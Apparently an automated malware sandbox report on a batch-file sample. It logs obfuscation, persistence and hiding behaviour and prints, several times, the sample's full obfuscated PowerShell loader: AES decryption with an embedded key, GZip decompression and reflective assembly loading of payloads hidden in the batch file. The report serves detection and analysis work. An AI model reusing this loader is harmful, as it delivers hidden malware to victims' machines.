Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000020.00000002.3344625315.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531399417.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000020.00000002.3343830318.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000020.00000000.1531330977.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Users\user\Desktop\product.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: cmd.exe /c echo function vhVnA($zVdEq){ $TQYfY=[System.Security.Cryptography.Aes]::Create(); $TQYfY.Mode=[System.Security.Cryptography.CipherMode]::CBC; $TQYfY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $TQYfY.Key=[System.Convert]::FromBase64String('axHRlwLJv4pwkbOf9iAIJflO6gLEZt+6bKCh3RuytCA='); $TQYfY.IV=[System.Convert]::FromBase64String('TxAvkYK6lZIDMpmpV8o+4Q=='); $bqyNP=$TQYfY.CreateDecryptor(); $fZHAT=$bqyNP.TransformFinalBlock($zVdEq, 0, $zVdEq.Length); $bqyNP.Dispose(); $TQYfY.Dispose(); $fZHAT;}function FpYMp($zVdEq){ Invoke-Expression '$fEGds=New-Object *S*y*s*t*e*m*.*I*O*.M*em*or*yS*tr*ea*m(,$zVdEq);'.Replace('*', ''); Invoke-Expression '$xpQRA=New-Object *S*y*s*t*e*m*.*I*O*.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); Invoke-Expression '$mCrfz=New-Object S*y*s*t*e*m*.*I*O*.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($fEGds, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $mCrfz.CopyTo($xpQRA); $mCrfz.Dispose(); $fEGds.Dispose(); $xpQRA.Dispose(); $xpQRA.ToArray();}function zHrKT($zVdEq,$ulmvt){ Invoke-Expression '$kTVmP=[*S*y*s*t*e*m*.*R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$zVdEq);'.Replace('*', ''); Invoke-Expression '$aPGUN=$kTVmP.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); Invoke-Expression '$aPGUN.*I*n*v*o*k*e*($null, $ulmvt);'.Replace('*', '');}$SQOtV = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $SQOtV;$KFKSq=[System.IO.File]::ReadAllText($SQOtV).Split([Environment]::NewLine);foreach ($vmudF in $KFKSq) { if ($vmudF.StartsWith('iecMs')) { $hJZkz=$vmudF.Substring(5); break; }}$bRzqF=[string[]]$hJZkz.Split('\');Invoke-Expression '$STi = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$JnT = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');Invoke-Expression '$UpD = FpYMp (vhVnA ([*C*o*n*v*e*r*t]::*F*r*o*m*B*a*s*e*6*4*S*tr*i*n*g($bRzqF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('*', '');zHrKT $STi $null;zHrKT $JnT $null;zHrKT $UpD (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: IhrFKM.exe.35.drStatic PE information: 0xA8D14247 [Thu Oct 2 02:11:19 2059 UTC]
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1E1E3C LoadLibraryA,GetProcAddress,SleepEx,15_2_000001CA7D1E1E3C
Source: C:\Windows\System32\winlogon.exeCode function: 15_3_000001CA7D1CA7DD push rcx; retf 003Fh15_3_000001CA7D1CA7DE
Source: C:\Windows\System32\lsass.exeCode function: 16_3_0000017D2DD3A7DD push rcx; retf 003Fh16_3_0000017D2DD3A7DE
Source: C:\Windows\System32\svchost.exeCode function: 17_3_0000022F4B90A7DD push rcx; retf 003Fh17_3_0000022F4B90A7DE
Source: C:\Windows\System32\dwm.exeCode function: 18_3_00000262F1ECA7DD push rcx; retf 003Fh18_3_00000262F1ECA7DE
Source: C:\Windows\System32\dwm.exeCode function: 18_3_00000262F1CEA7DD push rcx; retf 003Fh18_3_00000262F1CEA7DE
Source: C:\Windows\System32\cmd.exeCode function: 22_3_000001B68BD0A7DD push rcx; retf 003Fh22_3_000001B68BD0A7DE
Source: C:\Windows\System32\conhost.exeCode function: 23_3_000001E591CAA7DD push rcx; retf 003Fh23_3_000001E591CAA7DE
Source: C:\Windows\System32\svchost.exeCode function: 26_3_000002234E11A7DD push rcx; retf 003Fh26_3_000002234E11A7DE
Source: C:\Windows\System32\svchost.exeCode function: 27_3_0000023942AFA7DD push rcx; retf 003Fh27_3_0000023942AFA7DE
Source: C:\Windows\System32\svchost.exeCode function: 28_3_000001EF056BA7DD push rcx; retf 003Fh28_3_000001EF056BA7DE
Source: C:\Windows\System32\svchost.exeCode function: 29_3_000002287A7EA7DD push rcx; retf 003Fh29_3_000002287A7EA7DE
Source: C:\Windows\System32\svchost.exeCode function: 30_3_000001B94DA7A7DD push rcx; retf 003Fh30_3_000001B94DA7A7DE
Source: C:\Windows\System32\svchost.exeCode function: 31_3_000002520255A7DD push rcx; retf 003Fh31_3_000002520255A7DE
Source: C:\Windows\System32\svchost.exeCode function: 32_3_000001A9EBFAA7DD push rcx; retf 003Fh32_3_000001A9EBFAA7DE
Source: C:\Windows\System32\svchost.exeCode function: 33_3_0000019FF161A7DD push rcx; retf 003Fh33_3_0000019FF161A7DE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\IhrFKM.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$nya-onimai2\IhrFKM.exeJump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$nya-mW41WeM4Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: c:\users\user\desktop\product.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe:Zone.Identifier read attributes | deleteJump to behavior
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE $nya-dll32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
